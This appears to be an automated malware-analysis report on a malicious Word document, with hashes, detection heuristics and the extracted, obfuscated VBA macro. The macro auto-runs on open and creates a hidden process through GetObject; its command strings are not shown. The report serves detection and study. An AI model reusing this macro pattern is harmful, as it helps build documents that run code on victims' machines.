Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 24fb3a8919b70ce5…

MALICIOUS

Office (OLE)

163.6 KB Created: 2019-03-21 07:51:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: be3af2447df1b84824c9961674ebc852 SHA-1: 15a93edaff9f441a96c3837e6f13a6fd97a44716 SHA-256: 24fb3a8919b70ce589c57aba3b416f39a3136a7595909c0d401f74ab47973289
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The macro utilizes the AutoOpen function and the GetObject call, which are common indicators of malicious activity. The presence of these elements strongly suggests an attempt to execute arbitrary code, likely to download and run a secondary payload.

Heuristics 7

  • ClamAV: Doc.Malware.00536d-6904394-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6904394-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11061 bytes
SHA-256: 50b036633bae3345acecdcf08bf5d6114bedceaa379dbf2c083953087fdf5a5e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iQAoZAAQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ToBQAQAU"
Attribute VB_Base = "0{51E7B197-7237-49D0-8E12-9D4F33F51C38}{C1FE6852-1F98-4CBC-AA30-83EF6529269E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "F_AwBA"
Sub autoopen()
On Error Resume Next
   If bUAGoZB = RAG1DoA Then
   JACAxk = (710457559)
   cA1AA_ = (wAkQxUA * Log(234176360 + Atn(265125248 * RABwQk)) + XUGkCAAx + CDbl(BQXXAC - Sqr(WAGQBAB / CBool(403487077 / 790890056) + rQwkQGoA - Rnd(BUDDXw))) * 764328624 * 109473798)
   vUkGAwC = (119548777)
End If
   If JA1cQAk = RADDAAAk Then
   oDUBAQQw = (756835792)
   TXAAwU = (bQZA_kQ * Log(563522477 + Atn(897508302 * wAGGCA_A)) + zADxBC + CDbl(WZAQQU - Sqr(wwUAwA / CBool(730548565 / 937442634) + kQkBQc - Rnd(bUkkAX))) * 182487739 * 545345512)
   TAACUGUw = (719535755)
End If
Set cxkADA = GetObject(EAA1ADA + ToBQAQAU.TkBGQ4D + YA4XBkAA)
   If H1xQcGA = PAUAUkQ1 Then
   SkAB_B = (285702528)
   z4DA_xQ = (r1k1AAA * Log(626390355 + Atn(149629213 * FQBcZkDU)) + wUxwAAC + CDbl(BCAA_xAD - Sqr(bBUBAUw / CBool(764558718 / 378496997) + jAABAB - Rnd(vBDQwU))) * 951609534 * 772194350)
   z4ADAXU = (246719815)
End If
   If jABcAX = AAAAAwo_ Then
   R4oQAo = (665634783)
   uDDcABD = (IAAkoB * Log(762470668 + Atn(212658891 * tAoCAk)) + NDDCADG + CDbl(hBcDQcA - Sqr(DwUAQxDD / CBool(215923357 / 76587700) + jBAAkkA - Rnd(kAo_kDQw))) * 332239278 * 433924401)
   CAQoXAA = (600683028)
End If
   If ZA_Dc1A = CQAxAAZA Then
   KBDUAA = (768959014)
   IAAc1B = (VCQGQA * Log(511043833 + Atn(158982383 * wGACUAB)) + VAADwUAU + CDbl(d4_UQDU - Sqr(hUBBAAQ / CBool(201061409 / 447957769) + Zk_A_AQB - Rnd(mQxA_o))) * 509950142 * 283120311)
   AwUXABDB = (347885851)
End If
cxkADA.ShowWindow = 796713 - 796713
   If dAAk1k = YDAZABxU Then
   DZA_cCCQ = (400346871)
   hAZUQAQ = (UBAAAZ1o * Log(795585158 + Atn(889226940 * p4BCDD)) + KQUZAAAB + CDbl(jZUwZZB4 - Sqr(hAAZXUo / CBool(554761292 / 643721005) + pABB4B - Rnd(q4_AAwAQ))) * 559988833 * 87661382)
   nwAAAA = (195148856)
End If
   If WXGUZD = IACcAB1 Then
   wDxX_AAU = (321982358)
   rCAo4DGX = (VZADCB * Log(801773299 + Atn(23713028 * FAA1ow)) + BZcXCUAw + CDbl(TUoDBA - Sqr(jkQ1DDQ / CBool(28398717 / 577525272) + BxUDUXAx - Rnd(jAADAAA))) * 226843297 * 7688389)
   lAQBAAk = (629637192)
End If
GetObject(TXAAoXBA + ToBQAQAU.QBZDAZG + lUAoXwB). _
Create@ s1_1DUB + ToBQAQAU.aAAABC + WBGBxBwA + ToBQAQAU.P4A4AG + R_GAXG + ToBQAQAU.PDGQ1Gw + JocAwo, hAo1A1, cxkADA, LAcoGX
   If zXcQGQD = wZA_QQG Then
   hxAwUZG = (570384162)
   F1AQUA = (M4wDUAA * Log(407835625 + Atn(304222552 * SB4AQAA)) + Y_oDAAAD + CDbl(RwGAAXUQ - Sqr(Y1XGcGA / CBool(488489582 / 230218335) + iZDAQU - Rnd(CkGBDAD))) * 682638485 * 314394870)
   UUAA1X1X = (106574424)
End If
   If qCXGGU = wDAUGQB Then
   zGD4Bk = (932955277)
   t_GUxA_G = (YABwAAxQ * Log(493076800 + Atn(720779727 * UUZxA_)) + qABUQ_o1 + CDbl(MxABAxU - Sqr(sBBADCGA / CBool(252109750 / 189680532) + zDQAX4 - Rnd(soAXC_AA))) * 548380720 * 474016275)
   JUUAABX = (745664000)
End If
End Sub


' Processing file: /opt/analyzer/scan_staging/bd0cdd2ef6624ef2b9826170024317bb.bin
' ===============================================================================
' Module streams:
' Macros/VBA/iQAoZAAQ - 1106 bytes
' Macros/VBA/ToBQAQAU - 1158 bytes
' Macros/VBA/F_AwBA - 5308 bytes
' Line #0:
' 	FuncDefn (Sub F_AwBA())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Ld autoopen 
' 	Ld bUAGoZB 
' 	Eq 
' 	IfBlock 
' Line #3:
' 	LitDI4 0xB8D7 0x2A58 
' 	Paren 
' 	St RAG1DoA 
' Line #4:
' 	Ld cA1AA_ 
' 	LitDI4 0x3F68 0x0DF5 
' 	LitDI4 0x7D80 0x0FCD 
' 	Ld wAkQxUA 
' 	Mul 
' 	ArgsLd Atn 0x0001 
' 	Add 

... (truncated)